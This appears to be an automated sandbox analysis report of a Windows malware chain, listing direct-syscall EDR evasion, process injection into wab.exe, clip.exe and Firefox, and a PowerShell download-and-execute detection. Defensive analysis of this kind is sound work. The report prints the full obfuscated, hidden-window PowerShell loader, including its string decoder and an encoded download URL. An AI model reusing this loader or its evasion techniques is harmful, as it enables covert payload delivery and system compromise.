          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370BCD mov eax, dword ptr fs:[00000030h]10_2_21370BCD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370BCD mov eax, dword ptr fs:[00000030h]10_2_21370BCD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA38 mov eax, dword ptr fs:[00000030h]10_2_213ACA38
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21394A35 mov eax, dword ptr fs:[00000030h]10_2_21394A35
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21394A35 mov eax, dword ptr fs:[00000030h]10_2_21394A35
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EA2E mov eax, dword ptr fs:[00000030h]10_2_2139EA2E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA24 mov eax, dword ptr fs:[00000030h]10_2_213ACA24
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FCA11 mov eax, dword ptr fs:[00000030h]10_2_213FCA11
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ECA72 mov eax, dword ptr fs:[00000030h]10_2_213ECA72
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ECA72 mov eax, dword ptr fs:[00000030h]10_2_213ECA72
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA6F mov eax, dword ptr fs:[00000030h]10_2_213ACA6F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA6F mov eax, dword ptr fs:[00000030h]10_2_213ACA6F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA6F mov eax, dword ptr fs:[00000030h]10_2_213ACA6F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380A5B mov eax, dword ptr fs:[00000030h]10_2_21380A5B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380A5B mov eax, dword ptr fs:[00000030h]10_2_21380A5B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378AA0 mov eax, dword ptr fs:[00000030h]10_2_21378AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378AA0 mov eax, dword ptr fs:[00000030h]10_2_21378AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C6AA4 mov eax, dword ptr fs:[00000030h]10_2_213C6AA4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A8A90 mov edx, dword ptr fs:[00000030h]10_2_213A8A90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]10_2_2137EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444A80 mov eax, dword ptr fs:[00000030h]10_2_21444A80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AAAEE mov eax, dword ptr fs:[00000030h]10_2_213AAAEE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AAAEE mov eax, dword ptr fs:[00000030h]10_2_213AAAEE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370AD0 mov eax, dword ptr fs:[00000030h]10_2_21370AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A4AD0 mov eax, dword ptr fs:[00000030h]10_2_213A4AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A4AD0 mov eax, dword ptr fs:[00000030h]10_2_213A4AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C6ACC mov eax, dword ptr fs:[00000030h]10_2_213C6ACC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C6ACC mov eax, dword ptr fs:[00000030h]10_2_213C6ACC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C6ACC mov eax, dword ptr fs:[00000030h]10_2_213C6ACC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F8D20 mov eax, dword ptr fs:[00000030h]10_2_213F8D20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366D10 mov eax, dword ptr fs:[00000030h]10_2_21366D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366D10 mov eax, dword ptr fs:[00000030h]10_2_21366D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366D10 mov eax, dword ptr fs:[00000030h]10_2_21366D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A4D1D mov eax, dword ptr fs:[00000030h]10_2_213A4D1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21408D6B mov eax, dword ptr fs:[00000030h]10_2_21408D6B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138AD00 mov eax, dword ptr fs:[00000030h]10_2_2138AD00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138AD00 mov eax, dword ptr fs:[00000030h]10_2_2138AD00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138AD00 mov eax, dword ptr fs:[00000030h]10_2_2138AD00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21428D10 mov eax, dword ptr fs:[00000030h]10_2_21428D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21428D10 mov eax, dword ptr fs:[00000030h]10_2_21428D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]10_2_21378D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]10_2_21378D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]10_2_21378D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]10_2_21378D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]10_2_21378D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370D59 mov eax, dword ptr fs:[00000030h]10_2_21370D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370D59 mov eax, dword ptr fs:[00000030h]10_2_21370D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370D59 mov eax, dword ptr fs:[00000030h]10_2_21370D59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21398DBF mov eax, dword ptr fs:[00000030h]10_2_21398DBF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21398DBF mov eax, dword ptr fs:[00000030h]10_2_21398DBF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACDB1 mov ecx, dword ptr fs:[00000030h]10_2_213ACDB1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACDB1 mov eax, dword ptr fs:[00000030h]10_2_213ACDB1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACDB1 mov eax, dword ptr fs:[00000030h]10_2_213ACDB1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A6DA0 mov eax, dword ptr fs:[00000030h]10_2_213A6DA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21410DF0 mov eax, dword ptr fs:[00000030h]10_2_21410DF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21410DF0 mov eax, dword ptr fs:[00000030h]10_2_21410DF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366DF6 mov eax, dword ptr fs:[00000030h]10_2_21366DF6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139CDF0 mov eax, dword ptr fs:[00000030h]10_2_2139CDF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139CDF0 mov ecx, dword ptr fs:[00000030h]10_2_2139CDF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137ADE0 mov eax, dword ptr fs:[00000030h]10_2_2137ADE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137ADE0 mov eax, dword ptr fs:[00000030h]10_2_2137ADE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137ADE0 mov eax, dword ptr fs:[00000030h]10_2_2137ADE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_4324.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtClose: Direct from: 0x76EF2B6C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C00000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28DFF40Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.tooJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
